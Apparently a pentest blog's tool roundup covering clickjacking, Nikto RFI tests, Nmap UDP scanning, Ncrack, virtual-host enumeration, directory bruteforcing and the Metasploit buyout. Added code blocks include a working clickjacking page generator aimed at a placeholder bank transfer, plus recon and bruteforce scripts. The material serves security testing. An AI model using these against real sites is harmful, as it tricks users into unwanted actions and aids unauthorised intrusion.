Posts Tagged tools

ClickJacking, on the cheap…

So, Clickjacking…

“The basic idea is that an attacker loads the content of an external site into the site you’re visiting, sets the external content to be invisible and then overlays the page you’re looking at. When you click any link you see on the current page, you are in fact clicking on the externally loaded invisible page and about to load pretty much whatever the attacker wants.”

This is a current attack prevalent in a lot of advertising, pay-per-click schemes, and malware drops these days. The Attack Research guys did a pretty good rundown on the type of attacks that are being used in the wild.

Just a few days ago Samy from samy.pl released a quick clickjacking code generator. Check it out:

http://samy.pl/quickjack/
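As an added example (this is not quickjack's code and not from the original post), here is the overlay trick from the quote above in about thirty lines: a generator that frames a target URL at zero opacity on top of a visible decoy button, plus a check of the two response headers (X-Frame-Options and CSP frame-ancestors) that decide whether a page can be framed like this at all. The target URL, decoy text and attacker origin are placeholders.

```python
"""Added example, not quickjack's code: build a clickjacking PoC page and
check whether a target's response headers allow it to be framed."""
import html


def poc_page(target_url: str, decoy_text: str = "Click to claim your prize",
             offset_x: int = 0, offset_y: int = 0) -> str:
    """Return an HTML page that frames target_url invisibly above a decoy.
    The iframe gets the higher z-index, so a click on the visible decoy
    actually lands on the framed page; offset_x/offset_y shift the frame so
    the target's button sits exactly under the decoy."""
    url = html.escape(target_url, quote=True)
    return f"""<!doctype html>
<html><head><meta charset="utf-8"><title>Harmless page</title>
<style>
  #decoy  {{ position:absolute; top:200px; left:200px; z-index:1; font:18px sans-serif; }}
  #victim {{ position:absolute; top:{-offset_y}px; left:{-offset_x}px;
             width:1200px; height:900px; z-index:2; opacity:0; border:0; }}
</style></head>
<body>
  <button id="decoy">{html.escape(decoy_text)}</button>
  <iframe id="victim" src="{url}"></iframe>
</body></html>
"""


def frameable(headers: dict, attacker_origin: str) -> bool:
    """True if a page served with these headers can be framed from
    attacker_origin. frame-ancestors takes precedence over X-Frame-Options
    when both are present; no header at all means the page is frameable.
    Assumption: frame-ancestors sources are literal origins, 'self', 'none'
    or '*' (scheme/host wildcards are not expanded here)."""
    h = {k.lower(): v for k, v in headers.items()}
    for directive in h.get("content-security-policy", "").split(";"):
        name, _, rest = directive.strip().partition(" ")
        if name.lower() == "frame-ancestors":
            allowed = [s.strip().lower() for s in rest.split()]
            if "'none'" in allowed:
                return False
            # 'self' never matches a third-party attacker origin
            return "*" in allowed or attacker_origin.lower() in allowed
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return False
    if xfo.startswith("ALLOW-FROM"):
        return xfo[len("ALLOW-FROM"):].strip() == attacker_origin.upper()
    return True


if __name__ == "__main__":
    # Placeholder target and headers, not a real site
    target = "https://bank.example/transfer?to=attacker&amount=1000"
    print(frameable({"X-Frame-Options": "DENY"}, "https://evil.example"))   # False
    print(poc_page(target, offset_x=340, offset_y=510))
```

Run `frameable()` against the headers of the page you want to protect before assuming the overlay will work; a page that sends DENY, SAMEORIGIN or a frame-ancestors list that excludes you simply will not render inside the iframe.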


Your Nikto’s on Fire…

Earlier this week (or rather end of last week) Robert Hansen aka RSnake released a huge, compiled list of Remote File Include Vulnerable parameters. To sweeten the deal Rob Fuller (mubix) and a few others parsed out the OSVDB’s CSV database and the compiled milw0rm site for all RFI’s listed there.

What we’re left with is a gargantuan list of RFI vulnerabilities to search for.

The first thing that came to my mind when I saw that list was “hey, I’ll parse that into the Nikto database” but, alas, Sullo (Nikto’s author) moves quickly: he had already released a new version of Nikto with the RFI tests baked in.

In addition to the RFI goodness, 2.1.1 contains bug fixes and a few new features:

- New remote file inclusion (RFI) testing
- Over 2300 new RFI tests (courtesy RSnake/OSVDB)
- Sending of each test ID in the User-Agent
- Libwhisker 2.5, which includes 2 new IDS evasion techniques
- Ability to run specific plugins
- XML report now includes SSL information

Check it out here =)


UDP Payload Scanning

** Note: We all love the Internet Storm Center. By far it’s one of the largest conglomerations of brilliant engineers I know. So it doesn’t really surprise me that when I was going to write a blog post on Nmap’s new UDP payload scanning yesterday, contributor Rob VandenBrink beat me to it. Here is mine anyway =P Rob’s goes into great detail with some packet captures to show before and after.

UDP…UDP…UDP… oh how do i scan thee?

The issue facing accurate scanning of UDP ports is the nature of UDP services themselves. A service that receives a datagram it cannot parse usually drops it without replying, so an empty probe to an open port looks exactly like a probe that was filtered. This is bad news for pentesters, as we want a full and accurate scan of our targets.

UDP payload scanning is the solution (most of the time). Instead of an empty UDP packet, we send a legitimate payload that the service on that port will parse, e.g. a DNS query to udp/53 or an SNMP GetRequest to udp/161. A response means the port is open; an ICMP port unreachable means it is closed; silence still leaves us with open|filtered, but there are now far fewer of those.

Before Nmap 5.21, Nmap did not support UDP payload scanning. Pentesters previously counted on free tools like UnicornScan, whose author Jack C. Louis passed away last year (rest in peace Jack), or udp-proto-scanner by Portcullis Labs.

Although these tools are often stellar, they are sometimes buggy and lack the Nmap-style features we want in a port scanner.

Nmap 5.21 fixes our dilemma by adding protocol-specific payloads for the following UDP ports:

udp/7 echo
udp/53 domain
udp/111 rpcbind
udp/123 ntp
udp/137 netbios-ns
udp/161 SNMP
udp/177 xdmcp
udp/500 ISAKMP
udp/520 route
udp/1645 RADIUS
udp/1812 RADIUS
udp/2049 NFS
udp/5353 zeroconf
udp/10080 amanda

I know this has been a good number of months in development, thanks for all the good work Fyodor and the Nmap Dev Community!


Ncrack – Network Password Cracker

The 2009 Google Summer of Code has a special present for us pentesters. Normally we use Hydra or Medusa to crack network service passwords (telnet, FTP, SSH, etc.).

Ncrack changes the game a bit.

By bringing the Nmap dev team/community to the table it shows promise to fix some current issues in bruteforcing network service passwords. This has already happened in one instance; read the openssh_library paper here. It also lets us bruteforce multiple targets and takes the standard Nmap target syntax (hostnames, CIDR, ranges, and single IPs), which is very extensible and convenient for scripting.

Additionally it can take input from all of Nmap’s output files, making certain portions of a pentest faster, meaner, and leaner. We can specify IPs not to bruteforce, or pass it a whole list of IPs not to test. It runs many connections in parallel and provides easy tuning options (not all have been activated yet). In addition it has a very simple syntax for bruting services on non-standard ports.

While it’s still relatively new and doesn’t have a GUI like Hydra, or as many modules as Medusa, it’s still an awesome addition to any pentesters toolbelt.

Check out the man page here: http://nmap.org/ncrack/man.html

The latest version can be downloaded here: http://nmap.org/ncrack

Note: Ncrack is a new project started in the Summer of Code 2009. While it is already useful for some purposes, it is still unfinished, alpha quality software. You can help out by testing it and reporting any problems as described in the section called “Bugs”. Currently it still only has modules for FTP, SSH, TELNET and HTTP(S).

Happy Cracking!


Hostmap – shared/virtual host enumeration

You either love or hate Sun Tzu quotes but, when they apply, I’m inclined to use them ;)

“It is said that if you know your enemies and know yourself, you will not be imperiled in a hundred battles; if you do not know your enemies but do know yourself, you will win one and lose one; if you do not know your enemies nor yourself, you will be imperiled in every single battle”

And so it is also with some web servers! Do you manage your own hosting? Or, like the million others out there, do you share one mega-server hosting hundreds of other sites as well?

Part of the recon stage of pentesting is checking for shared hosting. If other sites live on the same server, your security is only as strong as theirs: a file-upload bug or a weak admin password in a neighbour’s web app can hand an attacker a shell on the box that also serves your site. The web applications they deploy may not be as well thought out, secure, or even documented.

Long have I searched for ways to enumerate these virtual hosts, but each avenue was a semi-manual process. Now I have settled on a stellar tool by Alessandro `jekil` Tanasi called Hostmap. It uses a plethora of DNS and scraping tricks to accomplish this task for us. Check out the documentation =)
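Two of the tricks a shared-hosting check leans on are easy to show in code. As an added example (not Hostmap’s code and not from the original post), the block below forward-resolves a list of candidate names and keeps the ones that land on the target IP, then sends HTTP requests to that IP with each name in the Host header and keeps the names that get a different answer from a deliberately bogus host. The IPs, names and response sizes are constructed fixtures so it runs offline; the `resolve` and `fetch` parameters default to real DNS and HTTP.

```python
"""Added example, not Hostmap's code: virtual-host enumeration by forward DNS
and by HTTP Host-header probing, with constructed fixtures for offline use."""
import http.client
import secrets
import socket


def cohosted_by_dns(target_ip, candidates, resolve=socket.gethostbyname):
    """Keep the candidate names whose A record points at target_ip."""
    hits = set()
    for name in candidates:
        try:
            if resolve(name) == target_ip:
                hits.add(name)
        except OSError:          # NXDOMAIN, SERVFAIL, timeouts (gaierror is an OSError)
            continue
    return sorted(hits)


def default_fetch(ip, host, timeout=5.0):
    """GET / from ip with an explicit Host header; return (status, body length)."""
    conn = http.client.HTTPConnection(ip, 80, timeout=timeout)
    try:
        conn.request("GET", "/", headers={"Host": host, "User-Agent": "vhost-probe"})
        resp = conn.getresponse()
        return resp.status, len(resp.read())
    finally:
        conn.close()


def vhosts_by_host_header(ip, candidates, fetch=default_fetch):
    """A name is served as a virtual host on ip when asking for it returns
    something other than the catch-all answer a random bogus Host gets."""
    baseline = fetch(ip, f"{secrets.token_hex(6)}.invalid")
    return [name for name in candidates if fetch(ip, name) != baseline]


# Constructed fixtures (documentation-range IPs, not real hosts) for offline runs.
SAMPLE_IP = "203.0.113.10"
SAMPLE_DNS = {"shop.example": "203.0.113.10", "blog.example": "203.0.113.10",
              "other.example": "198.51.100.7"}
SAMPLE_SITES = {"shop.example": (200, 4120), "blog.example": (200, 9811)}


def sample_resolver(name):
    """Stand-in for socket.gethostbyname over SAMPLE_DNS."""
    if name not in SAMPLE_DNS:
        raise socket.gaierror(-2, "Name or service not known")
    return SAMPLE_DNS[name]


def sample_fetch(ip, host):
    """Stand-in for default_fetch: unknown names get the catch-all 404 page."""
    return SAMPLE_SITES.get(host, (404, 266))


if __name__ == "__main__":
    names = ["shop.example", "blog.example", "other.example", "nope.example"]
    print("by DNS:        ", cohosted_by_dns(SAMPLE_IP, names, resolve=sample_resolver))
    print("by Host header:", vhosts_by_host_header(SAMPLE_IP, names, fetch=sample_fetch))
```

The Host-header pass catches names whose DNS no longer points at the box (stale records, names only reachable through a load balancer), which is why a tool like Hostmap combines several sources rather than trusting any one of them.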


Interview: Ferruh Mavituna on Netsparker, the New Web 2.0 Application Scanner

Also featured on Ethicalhacker.net. Feel free to respond to this article or ask any/all questions to Ferruh at Ethicalhacker.net’s forums.

Today we showcase a new web application scanner called Netsparker, and believe us when we say that we put this app through the wringer.

There’s a big distinction between testing a tool against dummy apps in a lab and using it first hand against a large environment. Luckily for us we got to do both.

Over the course of a month we ran several engagements and specifically watched Netsparker’s performance compared to other tools we normally use in the assessment process (w3af, Grendel Scan, Nikto, Wikto, Websecurify, Paros, Burp, etc). We have to say, we are very impressed. Netsparker not only caught vulnerabilities that other scanners missed but also had excellent remediation and a documentation section for most of its findings.

For injection it does a full-scale attack, testing every parameter it can spider (which it also does very well), and, although this lengthens the testing time, it also rewarded us with some valuable injection findings. Netsparker is developed by Mavituna Security, and more specifically by our guest, Ferruh Mavituna.

—–

Ferruh, thanks for joining us today.


Simple yet effective: Directory Bruteforcing

One thing you learn when you start a career pentesting is:

Never assume anything.

In my experience hacks aren’t always elegant and elaborate. Sometimes something simple and effective is your avenue of penetration. Which brings us to today’s topic: directory bruteforcing.

Directory bruteforcing is a favorite of mine. I can’t tell you how many times a directory listing has broken open a pentest for me. Whether it be that all elusive web admin panel, or a directory listing containing a database with passwords, there’s almost always something hiding beneath that tidy little web server.

Before we start bashing away, and let’s be honest here, that’s what we’re doing, we have to mention that this kind of enumeration can get you blacklisted. In fact, if your scope doesn’t have you whitelisted for the engagement, we recommend you scan low and slow to get a feel for the target’s response. It never hurts to have a backup IP (or a few) to scan from as well. Dealing with customer blacklisting is a pain.

Today we’re showcasing the Python-based Wfuzz by Edge-Security and the Java-based Dirbuster maintained by the OWASP project. Both are excellent directory and file bruteforcing tools that come complete with lists of common (and sometimes not so common) directories and files. Both support recursion, multi-threading, and output to useful file formats. Both also have built-in false-positive detection and support proxies… excellent. We use Wfuzz on our *nix boxes and Dirbuster from Windows. We interchange lists frequently.

We hate to regurgitate verbatim but Wfuzz actually gives pretty good usage and feature documentation that can be seen on their website here.

“Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc), bruteforce GET and POST parameters for checking different kind of injections (SQL, XSS, LDAP,etc), bruteforce Forms parameters (User/Password), Fuzzing,etc.”

Usage:

# wfuzz.py -c -z file -f wordlists/commons.txt --hc 404 --html http://www.mypentesttarget.com/FUZZ 2> results.html

This does a basic directory bruteforce against http://www.mypentesttarget.com/, sending an HTTP GET for every line in the wordlists/commons.txt file. --hc 404 hides the 404 Not Found responses, and --html writes the report as HTML (on stderr, hence the 2>) for later use.

Wfuzz is actually a far more robust tool allowing you to fuzz web parameters to identify SQL injection, XSS, and bruteforce usernames and passwords. The lists for these injection strings are included with wfuzz. We will showcase Wfuzz in more detail in a future write-up.

Dirbuster is very similar. It uses a pretty java GUI that allows you to specify number of threads and tune the amount of threads on the fly (which is actually really handy). It also supports pausing which is useful. Another great feature it offers is selective recursion. If Dirbuster finds a directory it will automagically queue it for recursive scanning, but if we want to skip that directory we can un-check the tick box next to it and change this on the fly. The GUI itself is pretty self explanatory and you can see basic usage in the video.

So what are we looking for?

Some of our favorites are:

  • Jboss admin panels
  • Backend web administration (think VPN, firewall, and website management logins)
  • OWA servers
  • Frontpage Config Files
  • Citrix Portals
  • Directories with databases
  • Webcam portals
  • Development/stage versions of software/sites
  • Default PHP Config files
  • 401 credential protected directories
  • Directories containing documents we can mine for metadata
  • Scripts we can fiddle with (list below)

For file types we wanna look for things like scripts we might be able to manipulate, log files, etc:

  • .log, .phtml, .php, .php3, .php4, .php5, .inc, .asp, .aspx, .pl, .pm, .cgi, .lib, .jsp, .jspx, .jsw, .jsv, .jspf, .cfm, .cfml, .cfc, .dbm, .mdb

Even resources that give you 403 Forbidden responses are valuable in identifying the web server’s structure and the apps that run on it.

Earlier we said that we interchange lists. Here’s why. Below are the sizes, in words, of the lists supplied with Wfuzz and Dirbuster (as well as another favorite tool of ours, Grendel Scan). The whopping difference here is that Dirbuster’s lists are huge comparatively. The reason for this is that Dirbuster uses a large number of numeric-only resource requests. Dirbuster also seems to really take the word “bruteforce” to heart, requesting less-than-technical directory names. We’d love to say “use X list over Y list” but we really can’t; we have garnered valuable findings from all of these lists. If you aren’t under the blacklisting/shunning gun per se you can cat these into a “masterdirs” file and then sort and uniq it. Just be aware that the bundled lists are deliberately not alphabetical: they are ordered with the most likely names first, and sort/uniq throws that ordering away. If you have the time to run the full list it doesn’t matter, but if you have a short testing window it will.

Tool          List      Words
Wfuzz         common    947
Wfuzz         medium    1660
Wfuzz         big       3037
Dirbuster     small     81643
Dirbuster     medium    207631
Dirbuster     big       1185252
Grendel Scan  Small     100
Grendel Scan  Medium    300
Grendel Scan  Large     500
Grendel Scan  XL        819

In our video we show the basic usage of both tools. We also showcase uploading a PHP shell from Laudanum and SamuraiWTF

If you’re working with a scope that limits tools you can install, or you want to comb over some could-be false positives from a tools output you can do this by using a bash script (be easy on our Bash foo!)

# cat dircurl.sh
#!/usr/bin/env bash
# Request every entry in a directory list against one host and print the
# line count of each response, so the catch-all error page stands out as
# one repeated number.
if [[ $# -ne 2 ]]; then
    echo "usage: $0 directorylist www.target.com" >&2
    exit 1
fi
while IFS= read -r dir; do
    [[ -z "$dir" ]] && continue                     # skip blank lines
    count=$(curl -s "http://$2/$dir" | wc -l)       # -s: no progress meter
    printf 'directory: %s\tcount: %s\n' "$dir" "$count"
done < "$1"

This does a curl request for each line in the supplied “directorylist” against the target and then counts the lines of the response (wc -l). Look at the output: what is the most common response?

# bash dircurl.sh scanneroutput www.securityaegis.com
directory: sitemap      count: 266
directory: archives     count: 266
directory: wp-admin     count: 7
directory: links        count: 0
directory: login        count: 266
directory: articles     count: 266
directory: support      count: 266
directory: keygen       count: 266
directory: article      count: 266
directory: help count: 266
directory: events       count: 266
directory: archive      count: 266
directory: register     count: 266
directory: en   count: 266
directory: forum        count: 266
directory: wp-includes  count: 7
directory: software     count: 266
directory: downloads    count: 266
directory: security     count: 0
directory: category     count: 266
directory: content      count: 266
directory: main count: 266
directory: press        count: 266
directory: media        count: 266
directory: templates    count: 266
directory: services     count: 266
directory: icons        count: 266
directory: wp-content   count: 7
directory: resources    count: 0
directory: info count: 0
directory: overnment    count: 266
directory: corrections  count: 266
directory: ajax count: 266
directory: icom_includes        count: 266
directory: rules        count: 266
directory: tr   count: 266
directory: server       count: 266
directory: mirrors      count: 266
directory: government    count: 266
directory: corrections  count: 266

Looks like my error page (or in some cases my redirects) has about 266 lines. Let’s pipe that into grep -v 266, removing all lines containing 266 (crude, but it works as long as no directory name contains that number):

# bash dircurl.sh scanneroutput www.securityaegis.com |grep -v 266
directory: wp-admin     count: 7
directory: links        count: 0
directory: wp-includes  count: 7
directory: security     count: 0
directory: wp-content   count: 7
directory: resources    count: 0
directory: info count: 0

This gives us a good place to start poking.
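The grep -v 266 trick is one instance of a general idea: reduce every response to something small (status and size), treat the most common value as the catch-all error or redirect page, and only look at what differs. As an added example (not from the original post, Wfuzz or Dirbuster), the block below does that in Python, with a delay option for the low-and-slow scanning mentioned earlier and a tolerance for error pages that echo the requested path and so vary by a few bytes. The sample results are constructed to mirror the dircurl.sh output above; the base URL and wordlist are placeholders.

```python
"""Added example, not from the original post: baseline the catch-all response
of a directory bruteforce and report only the outliers."""
import time
import urllib.error
import urllib.request
from collections import Counter


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Keep 301/302 answers as-is: a redirect is itself a finding."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch_path(base, path, timeout=5.0):
    """Return (status, body length) for base/path without following redirects."""
    url = f"{base.rstrip('/')}/{path.lstrip('/')}"
    opener = urllib.request.build_opener(_NoRedirect())
    req = urllib.request.Request(url, headers={"User-Agent": "dirprobe"})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, len(resp.read())
    except urllib.error.HTTPError as err:      # 3xx/4xx/5xx still carry a body
        return err.code, len(err.read())


def baseline_and_outliers(results, tolerance=0):
    """results: iterable of (path, status, length). Returns the most common
    (status, length) pair, i.e. the catch-all page, and every entry whose
    status differs or whose length is more than tolerance bytes away."""
    results = list(results)
    baseline = Counter((s, n) for _, s, n in results).most_common(1)[0][0]
    outliers = [(p, s, n) for p, s, n in results
                if s != baseline[0] or abs(n - baseline[1]) > tolerance]
    return baseline, outliers


def run(base, wordlist, delay=0.0, tolerance=0):
    """Low-and-slow version of dircurl.sh: one request per word, delay seconds apart."""
    results = []
    for word in wordlist:
        status, length = fetch_path(base, word)
        results.append((word, status, length))
        time.sleep(delay)
    return baseline_and_outliers(results, tolerance)


# Constructed sample (bytes, not lines) mirroring the dircurl.sh output above.
SAMPLE_RESULTS = [
    ("sitemap", 404, 9120), ("archives", 404, 9120), ("wp-admin", 302, 0),
    ("links", 403, 0), ("login", 404, 9120), ("forum", 404, 9124),
    ("wp-includes", 403, 0), ("security", 404, 9120), ("wp-content", 200, 1530),
]


if __name__ == "__main__":
    baseline, hits = baseline_and_outliers(SAMPLE_RESULTS, tolerance=8)
    print("baseline (status, length):", baseline)
    for path, status, length in hits:
        print(f"{path:<14} {status} {length}")
    # Against a live target (placeholder URL): run("http://www.target.example", ["admin", "backup"], delay=2.0)
```

With tolerance=0 the “forum” entry (4 bytes longer than the baseline) is reported too, which is the kind of near-miss an error page that echoes the path produces; pick the tolerance after eyeballing the spread of sizes, the way the 266 was picked above.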

Thanks go to David, Paul, and Nate from the Redspin Team, and of course Mike Kelly (Laz3r) for his contributions on the video =)


Metasploit Buyout

New Logo

Today HD Moore and Rapid7 announced that Rapid7 has purchased the Metasploit Framework Project. The speculation around this has taken the pentest and vulnerability scanning community by storm.  After talking with some colleagues I have come up with the following, here’s some things you should know:

First, be happy for H.D. Moore. He is one of the hardest working exploit devs and project managers in the world. Not only HD, but Egypt as the first paid core dev for the project.  Congratulate them.  Bravo.

HDM and Rapid7 have stated that “Rapid7 is 100% committed to keeping the project open source and the community development model.” This is not so much a buyout as corporate backing of MSF and HD’s vision for the project. For now (or “anytime soon”) the 3-clause BSD license will not be going anywhere. MSF will be sticking with Ruby, and Rapid7 has no plans, for now, to corporatize MSF. Rapid7 wants to take the MSF brand and stand behind it.

There is some worry about community submissions to MSF now that it is owned by R7. Rob Fuller (mubix) gave a pretty straight forward answer to that in reply to Sourcefire’s VRT blog:

“For those not happy that the development for or submission of your ideas / exploits to the Metasploit project now that submissions will also go to Rapid 7 are seriously underestimating the fact that all those companies were pulling that information already.”

What does it mean for R7’s NeXpose vulnerability product?

Well, it’s really about extensibility and market share. Adding the exploit database from MSF to NeXpose gives the product a far better risk rating by adding a way to validate vulnerabilities and rate them by currently known exploit code. They also gain the name, rights, branding, and developers of the MSF project, which all funnels into the Rapid7 corporate brand. As R7’s new CSO, HD Moore brings his talents to the R7 table. In addition, R7 does not just offer vulnerability management solutions but also penetration testing solutions, which is a market they have fought to be in for a while. Now they have legs to stand on, so to speak, when battling dominant market competitors like CORE, SAINT, and ImmunitySec.

Catch an exclusive interview with HD and R7 on the Risky Business Podcast =)

Heres a pretty complete article roundup on the buyout:

http://blog.metasploit.com
http://www.metasploit.com/home/faq
http://blog.metasploit.com/2009/10/metasploit-rising.html
http://www.rapid7.com/metasploit-announcement.jsp
http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1371945,00.html
http://www.darkreading.com/vulnerability_management/security/management/showArticle.jhtml?articleID=220800067
http://infosanity.wordpress.com/2009/10/21/rapid7-acquire-metasploit/
http://blog.ianetsec.net/perspective/2009/10/nick-selby-metasploit-acquisition-shakes-up-the-pentest-landscape.html
http://isc.sans.org/diary.html?storyid=7417
http://vrt-sourcefire.blogspot.com/2009/10/rapid7-make-bold-statement-acquiring.html
http://www.andrewhay.ca/archives/1085
